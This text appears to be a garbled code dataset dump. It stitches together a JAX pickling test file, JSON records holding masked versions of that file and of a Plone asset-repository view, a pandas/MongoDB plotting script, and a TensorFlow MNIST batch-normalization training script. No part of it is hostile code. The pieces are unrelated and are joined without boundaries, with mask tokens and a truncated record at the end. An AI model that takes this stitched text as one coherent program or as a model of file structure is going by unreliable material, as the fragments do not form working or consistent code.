            key_after = pickle.loads(pickle.dumps(key_before))
            self.assertEqual(key_before.dtype, key_after.dtype)
            self.assertArraysEqual(jax.random.key_data(key_before),
                                   jax.random.key_data(key_after))

    @parameterized.parameters(
        (pxla.PartitionSpec(),),
        (pxla.PartitionSpec(None),),
        (pxla.PartitionSpec('x', None),),
        (pxla.PartitionSpec(None, 'y'),),
        (pxla.PartitionSpec('x', 'y'),),
        (pxla.PartitionSpec(('x', 'y'),),),
    )
    def testPickleOfPartitionSpecs(self, partition_spec):
        restored_spec = pickle.loads(pickle.dumps(partition_spec))
        self.assertIsInstance(restored_spec, pxla.PartitionSpec)
        self.assertTupleEqual(partition_spec, restored_spec)

    def testPickleX64(self):
        # Pickle a float64 array while x64 is on, unpickle while it is off:
        # the value survives but the dtype is demoted to float32.
        with jax.experimental.enable_x64():
            wide = jnp.array(4.0, dtype='float64')
            payload = pickle.dumps(wide)
        with jax.experimental.disable_x64():
            narrow = pickle.loads(payload)
        self.assertEqual(wide.dtype, jnp.float64)
        self.assertArraysEqual(wide, narrow, check_dtypes=False)
        self.assertEqual(narrow.dtype, jnp.float32)
        self.assertEqual(narrow.aval.dtype, jnp.float32)
        self.assertIsInstance(narrow, type(wide))

    def testPickleTracerError(self):
        # Tracers are abstract values; pickling one under jit must fail loudly.
        with self.assertRaises(core.ConcretizationTypeError):
            jax.jit(pickle.dumps)(0)
# Script entry point: run the whole suite with JAX's custom test loader.
if __name__ == "__main__":
    absltest.main(testLoader=jtu.JaxTestLoader())
|
flexible
|
{
"blob_id": "79c8e87e1d247eef8dd1ca8e307bbe6d25bf48e2",
"index": 8172,
"step-1": "<mask token>\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n <mask token>\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = 
pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77)\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = 
pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\n<mask token>\n",
"step-4": "<mask token>\ntry:\n import cloudpickle\nexcept ImportError:\n cloudpickle = None\n<mask token>\nconfig.parse_flags_with_absl()\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77)\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77)\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1), jax.random.\n key_data(k2))\n\n @parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(\n None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,\n 'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',\n 
'y')),))\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\n\nif __name__ == '__main__':\n absltest.main(testLoader=jtu.JaxTestLoader())\n",
"step-5": "# Copyright 2021 The JAX Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for interoperability between JAX and pickling libraries.\"\"\"\n\nimport pickle\nimport unittest\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\ntry:\n import cloudpickle\nexcept ImportError:\n cloudpickle = None\n\nimport jax\nfrom jax import core\nfrom jax import numpy as jnp\nfrom jax.config import config\nfrom jax.interpreters import pxla\nfrom jax._src import test_util as jtu\n\nconfig.parse_flags_with_absl()\n\n\nclass CloudpickleTest(jtu.JaxTestCase):\n\n @unittest.skipIf(cloudpickle is None, \"Requires cloudpickle\")\n def testPickleOfJittedFunctions(self):\n\n @jax.jit\n def f(x, y):\n return x * y\n\n @jax.jit\n def g(z):\n return f(z, z + 77) # noqa: F821\n\n expected = g(32)\n s = cloudpickle.dumps(g)\n del f, g\n\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(32)\n self.assertEqual(expected, actual)\n\n @unittest.skipIf(cloudpickle is None, \"Requires cloudpickle\")\n def testPickleOfPmappedFunctions(self):\n\n @jax.pmap\n def f(x, y):\n return x * y\n\n @jax.pmap\n def g(z):\n return f(z, z + 77) # noqa: F821\n\n expected = g(jnp.asarray([[32]]))\n s = cloudpickle.dumps(g)\n del f, g\n\n g_unpickled = pickle.loads(s)\n actual = g_unpickled(jnp.asarray([[32]]))\n self.assertEqual(expected, actual)\n\n\nclass PickleTest(jtu.JaxTestCase):\n\n def testPickleOfDeviceArray(self):\n x = jnp.arange(10.0)\n s = 
pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n def testPickleOfDeviceArrayWeakType(self):\n x = jnp.array(4.0)\n self.assertEqual(x.aval.weak_type, True)\n s = pickle.dumps(x)\n y = pickle.loads(s)\n self.assertArraysEqual(x, y)\n self.assertIsInstance(y, type(x))\n self.assertEqual(x.aval, y.aval)\n\n @jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])\n def testPickleOfKeyArray(self, prng_name):\n with jax.default_prng_impl(prng_name):\n k1 = jax.random.PRNGKey(72)\n s = pickle.dumps(k1)\n k2 = pickle.loads(s)\n self.assertEqual(k1.dtype, k2.dtype)\n self.assertArraysEqual(jax.random.key_data(k1),\n jax.random.key_data(k2))\n\n @parameterized.parameters(\n (pxla.PartitionSpec(),),\n (pxla.PartitionSpec(None),),\n (pxla.PartitionSpec('x', None),),\n (pxla.PartitionSpec(None, 'y'),),\n (pxla.PartitionSpec('x', 'y'),),\n (pxla.PartitionSpec(('x', 'y'),),),\n )\n def testPickleOfPartitionSpecs(self, partition_spec):\n restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))\n self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)\n self.assertTupleEqual(partition_spec, restored_partition_spec)\n\n def testPickleX64(self):\n with jax.experimental.enable_x64():\n x = jnp.array(4.0, dtype='float64')\n s = pickle.dumps(x)\n\n with jax.experimental.disable_x64():\n y = pickle.loads(s)\n\n self.assertEqual(x.dtype, jnp.float64)\n self.assertArraysEqual(x, y, check_dtypes=False)\n self.assertEqual(y.dtype, jnp.float32)\n self.assertEqual(y.aval.dtype, jnp.float32)\n self.assertIsInstance(y, type(x))\n\n def testPickleTracerError(self):\n with self.assertRaises(core.ConcretizationTypeError):\n jax.jit(pickle.dumps)(0)\n\nif __name__ == \"__main__\":\n absltest.main(testLoader=jtu.JaxTestLoader())\n",
"step-ids": [
6,
9,
10,
11,
13
]
}
|
[
6,
9,
10,
11,
13
] |
# Load people-counter readings from MongoDB and plot the daily average count.
import pandas as pd
from pymongo import MongoClient
import numpy as np

# Connect to the local MongoDB instance (note: non-default port 27018).
mongo_client = MongoClient('localhost', 27018)
mongo_db = mongo_client['ProjetoIN242']
mongo_collection = mongo_db['contadorpessoas']

# Fetch every document in the collection.
query = mongo_collection.find({})

# Build a DataFrame straight from the cursor's documents.
df = pd.DataFrame.from_records(query)

df_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ## column selection

# Average people count per day, rendered as a line plot.
# NOTE(review): the x=/y= kwargs have no effect when plotting a Series
# produced by groupby().mean() -- consider dropping them. Confirm intent.
df_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')
|
normal
|
{
"blob_id": "9d4559a363c4fd6f9a22dc493a7aaa0a22386c21",
"index": 8071,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-3": "<mask token>\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\nquery = mongo_collection.find({})\ndf = pd.DataFrame.from_records(query)\ndf_filtro = df[['Entrada', 'Dia', 'Quantidade de pessoas']]\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-4": "import pandas as pd\nfrom pymongo import MongoClient\nimport numpy as np\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\nquery = mongo_collection.find({})\ndf = pd.DataFrame.from_records(query)\ndf_filtro = df[['Entrada', 'Dia', 'Quantidade de pessoas']]\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y=\n 'Quantidade de pessoas')\n",
"step-5": "import pandas as pd\nfrom pymongo import MongoClient\nimport numpy as np\n\nmongo_client = MongoClient('localhost', 27018)\nmongo_db = mongo_client['ProjetoIN242']\nmongo_collection = mongo_db['contadorpessoas']\n\nquery = mongo_collection.find({})\n\ndf = pd.DataFrame.from_records(query)\n\ndf_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ##seleção de colunas\n\ndf_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
<|reserved_special_token_0|>
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
<|reserved_special_token_0|>
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage
class AssetRepositoryView(BrowserView):
""" Folderish content page default view """
def contained_items(self, uid):
stack = api.content.get(UID=uid)
return stack.restrictedTraverse('@@folderListing')()
def item_index(self, uid):
return len(self.contained_items(uid))
def preview_image(self, uid):
images = self.contained_items(uid)
preview = None
if len(images):
first_item = images[0].getObject()
if IImage.providedBy(first_item):
preview = first_item
return preview
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Module providing views for asset storage folder"""
from Products.Five.browser import BrowserView
from plone import api
from plone.app.contenttypes.interfaces import IImage


class AssetRepositoryView(BrowserView):
    """ Folderish content page default view """

    def contained_items(self, uid):
        """Return the folder listing of the content object with the given UID."""
        container = api.content.get(UID=uid)
        listing = container.restrictedTraverse('@@folderListing')
        return listing()

    def item_index(self, uid):
        """Return how many items the content object with the given UID contains."""
        return len(self.contained_items(uid))

    def preview_image(self, uid):
        """Return the first contained item when it is an image, else None."""
        items = self.contained_items(uid)
        if not items:
            return None
        candidate = items[0].getObject()
        if IImage.providedBy(candidate):
            return candidate
        return None
|
flexible
|
{
"blob_id": "70c20b38edb01552a8c7531b3e87a9302ffaf6c5",
"index": 5062,
"step-1": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n <mask token>\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-3": "<mask token>\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-4": "<mask token>\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Module providing views for asset storage folder\"\"\"\nfrom Products.Five.browser import BrowserView\nfrom plone import api\nfrom plone.app.contenttypes.interfaces import IImage\n\nclass AssetRepositoryView(BrowserView):\n \"\"\" Folderish content page default view \"\"\"\n\n def contained_items(self, uid):\n stack = api.content.get(UID=uid)\n return stack.restrictedTraverse('@@folderListing')()\n\n def item_index(self, uid):\n return len(self.contained_items(uid))\n\n def preview_image(self, uid):\n images = self.contained_items(uid)\n preview = None\n if len(images):\n first_item = images[0].getObject()\n if IImage.providedBy(first_item):\n preview = first_item\n return preview\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data

# Download/load MNIST with one-hot labels; reshape=False keeps images 28x28x1
# so they can feed the convolutional stack directly.
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True, reshape=False)
def fully_connected(prev_layer, num_units, batch_norm, is_training=False):
    """Dense layer (no bias) with optional batch normalization, then ReLU.

    Args:
        prev_layer: input tensor.
        num_units: width of the dense layer.
        batch_norm: whether to insert batch normalization before the ReLU.
        is_training: batch-norm mode flag (train vs. inference statistics).
    """
    dense = tf.layers.dense(prev_layer, num_units, use_bias=False, activation=None)
    if batch_norm:
        dense = tf.layers.batch_normalization(dense, training=is_training)
    return tf.nn.relu(dense)
def conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):
    """3x3 conv (depth = layer_depth * 4), optional batch norm, then ReLU.

    Every third layer (layer_depth divisible by 3) downsamples with stride 2;
    all others use stride 1.
    """
    strides = 2 if layer_depth % 3 == 0 else 1
    conv = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides, 'same',
                            use_bias=False, activation=None)
    if batch_norm:
        conv = tf.layers.batch_normalization(conv, training=is_training)
    return tf.nn.relu(conv)
# Hyperparameters for the training run.
num_batches = 3000
batch_size = 128
learning_rate = 0.002
layer_num = 5
batch_norm = True  # toggle to compare training with/without batch normalization

# Graph inputs: MNIST images (NHWC), one-hot labels, and a batch-norm mode flag.
inputs = tf.placeholder(tf.float32, [None, 28, 28, 1])
labels = tf.placeholder(tf.float32, [None, 10])
is_training = tf.placeholder(tf.bool)

# Stack of convolutional layers (conv_layer downsamples every third layer).
layer = inputs
for layer_i in range(1, 1+layer_num):
    layer = conv_layer(layer, layer_i, batch_norm, is_training)

# Flatten the conv output before the fully connected head.
orig_shape = layer.get_shape().as_list()

layer = tf.reshape(layer, shape=[-1, orig_shape[1] * orig_shape[2] * orig_shape[3]])
layer = fully_connected(layer, 100, batch_norm, is_training)

logits = tf.layers.dense(layer, 10)
# NOTE(review): sigmoid cross-entropy treats the 10 classes as independent
# binary targets; softmax cross-entropy is the usual choice for one-hot
# multi-class labels -- confirm before changing, since it alters the loss.
model_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=labels))
tf.summary.scalar('conv_loss',model_loss)

# Batch norm's moving-average updates live in UPDATE_OPS; making the train op
# depend on them ensures they run on every training step.
# NOTE(review): the two branches use different optimizers (Adam vs. plain SGD),
# which confounds any with/without-batch-norm comparison -- confirm intent.
if batch_norm:
    with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
        train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)
else:
    train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(model_loss)

# Accuracy: fraction of samples whose argmax prediction matches the label.
correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(labels,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))

with tf.Session() as sess:
    merged = tf.summary.merge_all()
    # Separate log dirs so TensorBoard can compare the two configurations.
    if batch_norm:
        logdir = "mnist/conv/SGD_batchnorm"
    else:
        logdir = "mnist/conv/SGD_no_batchnorm"
    writer = tf.summary.FileWriter(logdir, sess.graph)
    sess.run(tf.global_variables_initializer())
    for batch_i in range(num_batches):
        batch_xs, batch_ys = mnist.train.next_batch(batch_size)
        # One optimization step; is_training=True so batch norm uses batch stats.
        _,summary = sess.run([train_opt,merged], {inputs: batch_xs, labels: batch_ys, is_training: True})
        writer.add_summary(summary, batch_i)
        if batch_i % 500 == 0:
            # Periodic validation check (batch norm in inference mode).
            loss, acc = sess.run([model_loss, accuracy], {inputs: mnist.validation.images, labels: mnist.validation.labels, is_training: False})
            print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, loss, acc))
        elif batch_i % 100 == 0:
            # Cheaper progress check on the current training batch.
            loss, acc = sess.run([model_loss, accuracy], {inputs: batch_xs, labels: batch_ys, is_training: False})
            print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss, acc))

    # Final metrics on the held-out splits.
    acc = sess.run(accuracy, {inputs: mnist.validation.images, labels: mnist.validation.labels,is_training: False})
    print('Final validation accuracy: {:>3.5f}'.format(acc))
    acc = sess.run(accuracy, {inputs: mnist.test.images, labels: mnist.test.labels,is_training: False})
    print('Final test accuracy: {:>3.5f}'.format(acc))
|
normal
|
{
"blob_id": "17b3f51779bda5a48c4d77c35d6bbdd2aadb13cd",
"index": 1432,
"step-1": "<mask token>\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef fully_connected(prev_layer, num_units, batch_norm, is_training=False):\n layer = tf.layers.dense(prev_layer, num_units, use_bias=False,\n activation=None)\n if batch_norm:\n layer = tf.layers.batch_normalization(layer, training=is_training)\n layer = tf.nn.relu(layer)\n return layer\n\n\ndef conv_layer(prev_layer, layer_depth, batch_norm, is_training=False):\n if layer_depth % 3 == 0:\n strides = 2\n else:\n strides = 1\n conv_layer = tf.layers.conv2d(prev_layer, layer_depth * 4, 3, strides,\n 'same', use_bias=False, activation=None)\n if batch_norm:\n conv_layer = tf.layers.batch_normalization(conv_layer, training=\n is_training)\n conv_layer = tf.nn.relu(conv_layer)\n return conv_layer\n\n\n<mask token>\nfor layer_i in range(1, 1 + layer_num):\n layer = conv_layer(layer, layer_i, batch_norm, is_training)\n<mask token>\ntf.summary.scalar('conv_loss', model_loss)\nif batch_norm:\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(model_loss)\nelse:\n train_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(\n model_loss)\n<mask token>\nwith tf.Session() as sess:\n merged = tf.summary.merge_all()\n if batch_norm:\n logdir = 'mnist/conv/SGD_batchnorm'\n else:\n logdir = 'mnist/conv/SGD_no_batchnorm'\n writer = tf.summary.FileWriter(logdir, 